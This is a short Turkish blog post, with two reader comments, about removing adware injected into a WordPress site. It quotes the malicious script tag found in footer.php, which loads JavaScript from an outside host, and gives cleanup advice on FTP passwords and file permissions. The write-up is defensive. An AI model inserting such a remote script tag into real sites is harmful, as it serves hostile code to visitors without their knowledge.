Sitenizde “Ads by romeoads . com” reklam görürseniz…
Merhabalar… bir arkadaşım sitesini googledan arattırıp girdiğinde “Ads by romeoads . com” tarafından yüklenmiş abuk sabuk reklamlarla karşılaştığını söyledi.
Bir ufak yardım edelim dedik ve sonuç:
wordpress te footer.php de şu satırlarla karşılaştım:
<script type=”text/javascript” src=”http://top5result.com/promo/center.js”></script>
bu satırları silince sorun çözüldü. eğer sizinde başınıza gelirse bunun sebebleri
- ftp yaptığınız bilgisayara virüs bulaşmış olabilir (en büyük ihtimal) eğer sorun bu ise bilgisayarınızı virüsten temizledikten sonra mutlaka “ftp” şifrelerinizi değiştirmelisiniz. bazen bir antivirüs yetmez
internetten online tarama yapan antivirüslerle de sisteminizi kontrol edin. - dosyaların hepsine chmod 777 verilmiş. bu da kısaca şu demektir ki önüne gelen dosyalarıma istediğini yazsın çıksın… sunucuda bu dosya ayarı 644 olmalıdır.
Virüs illetinden uzak günler …
Benzer Konularımıza da Göz Atın!
- Html 5 dir Tag
- HTML 5 br Tag
- Kutlu Doğum
- SMTP mail nedir?
- 10 Adımda Hızlı Seo Taktikleri
- Photoshop Yazı Efektleri Havai Fişek
- Photoshop’ta Gökkuşağı Efekti Yapma
- G Data InternetSecurity 2010 BEDAVA
- “session start () Cannot send session cache limiter – headers already sent” hatası
- Allah'ın Sadık Kulu
Categories: Genel

iframe virüsleri genellikle cute ftp programının crack yapılması sonucunda görülmektedir .
File zilla programını kullanmanızı tavsiye ederim.
@EqsheLans
haklısın filezillanın türkçe ve bedava olması, dosya ve klasör işlemlerinde cuteftp den daha hızlı olduğunu söylemektede fayda var…